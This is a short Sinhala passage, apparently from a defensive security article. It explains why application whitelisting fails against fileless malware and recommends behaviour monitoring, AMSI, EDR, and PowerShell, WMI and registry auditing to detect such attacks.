තවත් පොදු වැරැද්දක් නම් යෙදුම් සුදු ලැයිස්තුගත කිරීමෙන් සියල්ල විසඳෙන බව විශ්වාස කිරීමයි: ගොනු රහිත තාක්ෂණය හරියටම මේ මත රඳා පවතී. විශ්වාසදායක යෙදුම්පාලක මණ්ඩලය ඔවුන්ට අවසර තිබේද යන්න පමණක් නොව, ඔවුන් කරන දේ සහ ඔවුන් සම්බන්ධ වන ආකාරය නිරීක්ෂණය කළ යුතුය.

ඉහත සියල්ල සමඟින්, ඔබ සැබවින්ම වැදගත් දේ නිරීක්ෂණය කරන විට ගොනු රහිත අනිෂ්ට මෘදුකාංග "අවතාරයක්" වීම නතර කරයි: හැසිරීම, මතකය සහ මූලාරම්භය එක් එක් ක්‍රියාත්මක කිරීමේ හැකියාව. AMSI, පොහොසත් ක්‍රියාවලි දුරමිතිය, ස්වදේශීය Windows 11 පාලන සහ හැසිරීම් විශ්ලේෂණය සමඟ EDR ස්ථරයක් ඒකාබද්ධ කිරීමෙන් ඔබට වාසියක් ලැබේ. විධාන රේඛා සහ ක්‍රියාවලි ගස් ප්‍රමුඛත්වය දෙන මැක්‍රෝස් සහ පවර්ෂෙල්, WMI/රෙජිස්ට්‍රි විගණනය සහ දඩයම් කිරීම සඳහා යථාර්ථවාදී ප්‍රතිපත්ති සමීකරණයට එක් කරන්න, එවිට ඔබට මෙම දාම ශබ්දයක් නිකුත් කිරීමට පෙර කපා දමන ආරක්ෂාවක් ඇත.